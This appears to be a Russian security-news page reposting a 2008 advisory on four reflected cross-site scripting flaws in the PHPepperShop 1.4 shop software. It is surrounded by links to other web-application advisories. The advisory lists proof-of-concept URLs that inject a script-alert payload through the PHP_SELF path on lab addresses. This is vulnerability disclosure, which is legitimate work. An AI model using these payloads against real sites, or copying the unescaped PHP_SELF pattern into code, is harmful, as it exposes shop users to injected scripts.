Дополнительная информация Ежедневная сводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl) Эксплоит для эксплуатации уязвимости EZSA-2008-003 с активацией учетной записи [DSECRG-08-041] Stored XSS Vulnerability in Xoops 2.3.x [DSECRG-08-040] Multiple Local File Include Vulnerabilities in Xoops 2.3.x [DSECRG-08-040] Multiple Local File Include Vulnerabilities in Xoops 2.3.x From:th3.r00k_(at)_gmail.com <th3.r00k_(at)_gmail.com> Date:10 декабря 2008 г.Subject:XSS in PHPepperShop v 1.4Vulnerable Version:PHPepperShop v 1.4 Homepage:http://www.phpeppershop.com This is 4 reflective XSS flaws in the URI. Trust no one not even your $_SERVER[PHP_SELF] http://10.1.1.10/shop/kontakt.php/'<script>alert(1)</script> http://10.1.1.10/index.php/%22%3Cscript%3Ealert(1)%3C/scr ipt%3E http://10.1.1.155/Audit/Commerce/HackMe/shop/Admin/shop_kunden_mgmt.php/%22% 3Cscript%3Ealert(1)%3C/script%3E http://10.1.1.155/Audit/Commerce/HackMe/shop/Admin/SHOP_KONFIGURATION.php/"< script>alert(1)</script>
Ежедневная сводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)
Эксплоит для эксплуатации уязвимости EZSA-2008-003 с активацией учетной записи
[DSECRG-08-041] Stored XSS Vulnerability in Xoops 2.3.x
[DSECRG-08-040] Multiple Local File Include Vulnerabilities in Xoops 2.3.x
